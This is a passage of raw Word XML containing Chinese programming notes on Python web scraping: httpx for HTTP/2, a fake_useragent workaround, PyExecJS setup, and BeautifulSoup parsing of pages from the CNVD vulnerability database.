        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>TTP2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>而不弹窗提示；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3118030B" w14:textId="3BAEB66A" w:rsidR="00DC3841" w:rsidRPr="00A50AAE" w:rsidRDefault="00DC3841" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>程序访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的网站需要</w:t>
      </w:r>
      <w:r w:rsidR="00A50AAE" w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>使用兼容</w:t>
      </w:r>
      <w:r w:rsidR="00A50AAE" w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00A50AAE" w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
      <w:r w:rsidR="00A50AAE" w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的库</w:t>
      </w:r>
      <w:r w:rsidR="00A50AAE" w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> h</w:t>
      </w:r>
      <w:r w:rsidR="00A50AAE" w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">ttpx </w:t>
      </w:r>
      <w:r w:rsidR="00A50AAE" w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>而非</w:t>
      </w:r>
      <w:r w:rsidR="00A50AAE" w:rsidRPr="00A50AAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F319293" w14:textId="77777777" w:rsidR="00815BB0" w:rsidRDefault="00815BB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B89F69" w14:textId="77777777" w:rsidR="00815BB0" w:rsidRDefault="00815BB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39AC8B0A" w14:textId="77777777" w:rsidR="00815BB0" w:rsidRDefault="00815BB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CD21799" w14:textId="77777777" w:rsidR="00815BB0" w:rsidRDefault="00815BB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E867918" w14:textId="77777777" w:rsidR="00815BB0" w:rsidRDefault="00815BB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD6C6B9" w14:textId="77777777" w:rsidR="00815BB0" w:rsidRDefault="00815BB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ACC66CF" w14:textId="77777777" w:rsidR="00436121" w:rsidRDefault="00436121" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="609" w:name="_Toc159780042"/>
      <w:r>
        <w:t>fake_useragent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="609"/>
    </w:p>
    <w:p w14:paraId="50D50920" w14:textId="3D10CCAC" w:rsidR="007D0F2F" w:rsidRDefault="007D0F2F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04844DB1" w14:textId="13F16554" w:rsidR="007D0F2F" w:rsidRDefault="00335E08" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fake_</w:t>
      </w:r>
      <w:r>
        <w:t>useragent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程服务器没了，直接使用会报错，目前都会使用如下的，访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头，来获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC91691" w14:textId="7373845A" w:rsidR="003C5044" w:rsidRDefault="003C5044" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A95C12" w14:textId="79A67089" w:rsidR="003C5044" w:rsidRDefault="003C5044" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003C4CA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>安装的时候，如果我本地有</w:t>
      </w:r>
      <w:r w:rsidRPr="003C4CA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r w:rsidRPr="003C4CA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件这种的去使用</w:t>
      </w:r>
      <w:r w:rsidRPr="003C4CA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>fake</w:t>
      </w:r>
      <w:r w:rsidRPr="003C4CA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>_useragent,</w:t>
      </w:r>
      <w:r w:rsidRPr="003C4CA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>一般安装</w:t>
      </w:r>
      <w:r w:rsidR="00323690" w:rsidRPr="003C4CA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00323690" w:rsidRPr="003C4CA2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.1.11</w:t>
      </w:r>
      <w:r w:rsidR="00323690" w:rsidRPr="003C4CA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
      <w:r w:rsidR="00323690" w:rsidRPr="003C4CA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。安装最新版反而没有目前我熟悉使用的函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198DB133" w14:textId="77777777" w:rsidR="00335E08" w:rsidRDefault="00335E08" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A6A488" w14:textId="0CE01987" w:rsidR="00F45268" w:rsidRDefault="00AD2F76" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F020FC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import fake_useragent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C401907" w14:textId="77777777" w:rsidR="007D0F2F" w:rsidRDefault="007D0F2F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75DD4337" w14:textId="77777777" w:rsidR="007D0F2F" w:rsidRDefault="007D0F2F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取随机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user-agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4468835A" w14:textId="77777777" w:rsidR="007D0F2F" w:rsidRPr="00C35FF2" w:rsidRDefault="007D0F2F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C35FF2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>def get_random_useragent():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7883DC99" w14:textId="77777777" w:rsidR="007D0F2F" w:rsidRPr="00C35FF2" w:rsidRDefault="007D0F2F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C35FF2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    location = './fake/fake_useragent-%s.json' % fake_useragent.VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B2CFAB" w14:textId="77777777" w:rsidR="007D0F2F" w:rsidRPr="00C35FF2" w:rsidRDefault="007D0F2F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C35FF2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    ua = fake_useragent.UserAgent(path=location)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A25F1F1" w14:textId="67D5B726" w:rsidR="00F45268" w:rsidRDefault="007D0F2F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C35FF2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    return ua.random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6BEC8D" w14:textId="18F2E239" w:rsidR="007D0F2F" w:rsidRDefault="007D0F2F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38DD6C30" w14:textId="7D88A373" w:rsidR="00C35FF2" w:rsidRDefault="00C35FF2" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1718"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用时：</w:t>
      </w:r>
      <w:r w:rsidR="002664C1">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1866BD" w14:textId="77777777" w:rsidR="00C35FF2" w:rsidRDefault="00C35FF2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>HEADERS = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2A4DC2" w14:textId="77777777" w:rsidR="00C35FF2" w:rsidRDefault="00C35FF2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    'Connection': 'close',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF5D0EF" w14:textId="77777777" w:rsidR="00C35FF2" w:rsidRDefault="00C35FF2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    'Host':'www.cnvd.org.cn',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5D4947" w14:textId="77777777" w:rsidR="00C35FF2" w:rsidRDefault="00C35FF2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    'Pragma': 'no-cache',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D0E437" w14:textId="77777777" w:rsidR="00C35FF2" w:rsidRDefault="00C35FF2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    'Cache-Control': 'no-cache',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CFC707" w14:textId="77777777" w:rsidR="00C35FF2" w:rsidRDefault="00C35FF2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    'sec-ch-ua-mobile': '?0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05134877" w14:textId="77777777" w:rsidR="00C35FF2" w:rsidRDefault="00C35FF2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    'Upgrade-Insecure-Requests': '1',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE55E49" w14:textId="4FCFA684" w:rsidR="00C35FF2" w:rsidRDefault="00C35FF2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C35FF2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'User-Agent': get_random_useragent(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F56886B" w14:textId="719985B5" w:rsidR="00F45268" w:rsidRDefault="00F45268" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29AB6CB0" w14:textId="30756033" w:rsidR="006B2B56" w:rsidRDefault="006B2B56" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="420A3CE4" w14:textId="57DE10D6" w:rsidR="006B2B56" w:rsidRDefault="006B2B56" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="610" w:name="_Toc159780043"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">PyExecJS:execjs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言</w:t>
      </w:r>
      <w:bookmarkEnd w:id="610"/>
    </w:p>
    <w:p w14:paraId="7D38BDE7" w14:textId="3E1CF02E" w:rsidR="006B2B56" w:rsidRDefault="006B2B56" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7736E10F" w14:textId="1556AA68" w:rsidR="000A1290" w:rsidRPr="000A1290" w:rsidRDefault="000A1290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1290">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>先决条件：</w:t>
      </w:r>
      <w:r w:rsidRPr="000A1290">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="000A1290">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pt -y install nodejs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C47E6A" w14:textId="77777777" w:rsidR="000A1290" w:rsidRDefault="000A1290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="418EA88C" w14:textId="31641697" w:rsidR="006B2B56" w:rsidRPr="006B2B56" w:rsidRDefault="002E30E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002E30E0">
        <w:t>PyExecJS==1.5.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F84A36" w14:textId="67C37565" w:rsidR="006B2B56" w:rsidRDefault="006B2B56" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="507B9C07" w14:textId="64574B79" w:rsidR="002E30E0" w:rsidRDefault="00882727" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3 -m pip install </w:t>
      </w:r>
      <w:r w:rsidRPr="002E30E0">
        <w:t>PyExecJS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E1DE27" w14:textId="781471C7" w:rsidR="002E30E0" w:rsidRDefault="002E30E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435DE9E9" w14:textId="6D833924" w:rsidR="002E30E0" w:rsidRDefault="00882727" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用：</w:t>
      </w:r>
      <w:r>
        <w:t>import execjs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B3B1F0" w14:textId="29ABF6DB" w:rsidR="00882727" w:rsidRPr="00266F8D" w:rsidRDefault="000A1290" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00266F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果没有安装</w:t>
      </w:r>
      <w:r w:rsidRPr="00266F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nodejs</w:t>
      </w:r>
      <w:r w:rsidRPr="00266F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，会直接报错！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238C0922" w14:textId="4E47310C" w:rsidR="002E30E0" w:rsidRDefault="002E30E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C316F14" w14:textId="77777777" w:rsidR="002E30E0" w:rsidRDefault="002E30E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA6C617" w14:textId="77777777" w:rsidR="006B2B56" w:rsidRPr="00B471D8" w:rsidRDefault="006B2B56" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74169640" w14:textId="7E3A662A" w:rsidR="007E6558" w:rsidRDefault="009F3982" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="611" w:name="_Toc159780044"/>
      <w:r w:rsidRPr="009F3982">
        <w:t>bs4</w:t>
      </w:r>
      <w:bookmarkEnd w:id="611"/>
    </w:p>
    <w:p w14:paraId="0690736A" w14:textId="6E3B5588" w:rsidR="007E6558" w:rsidRDefault="006C4B07" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="612" w:name="_Toc159780045"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等类属性选取</w:t>
      </w:r>
      <w:bookmarkEnd w:id="612"/>
    </w:p>
    <w:p w14:paraId="3E975C83" w14:textId="2609CF2A" w:rsidR="009F3982" w:rsidRDefault="004906C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004906C1">
        <w:t>from bs4 import BeautifulSoup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615D431D" w14:textId="47500DE6" w:rsidR="004906C1" w:rsidRDefault="004906C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004906C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="004906C1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004906C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这里传入字节的</w:t>
      </w:r>
      <w:r w:rsidRPr="004906C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="004906C1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>es.content</w:t>
      </w:r>
      <w:r w:rsidRPr="004906C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>或者字符串文本的</w:t>
      </w:r>
      <w:r w:rsidRPr="004906C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="004906C1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>es.text</w:t>
      </w:r>
      <w:r w:rsidRPr="004906C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>都可以</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F14C276" w14:textId="6DCE7FCD" w:rsidR="009F3982" w:rsidRDefault="004906C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004906C1">
        <w:t>soup = BeautifulSoup(</w:t>
      </w:r>
      <w:r w:rsidRPr="004906C1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>res_content_vul</w:t>
      </w:r>
      <w:r w:rsidRPr="004906C1">
        <w:t>, 'html.parser')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4943C0E7" w14:textId="08F5A311" w:rsidR="007E6558" w:rsidRDefault="000F3AF9" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1266"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ABF77B" w14:textId="77777777" w:rsidR="000F3AF9" w:rsidRDefault="000F3AF9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> vul_name 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4208D7" w14:textId="77777777" w:rsidR="000F3AF9" w:rsidRDefault="000F3AF9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325A142C" w14:textId="77777777" w:rsidR="000F3AF9" w:rsidRDefault="000F3AF9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        divs = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC45CB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>soup.find_all(attrs={'class':'vue--heading title'})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D76117" w14:textId="77777777" w:rsidR="00D57090" w:rsidRDefault="00D57090" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
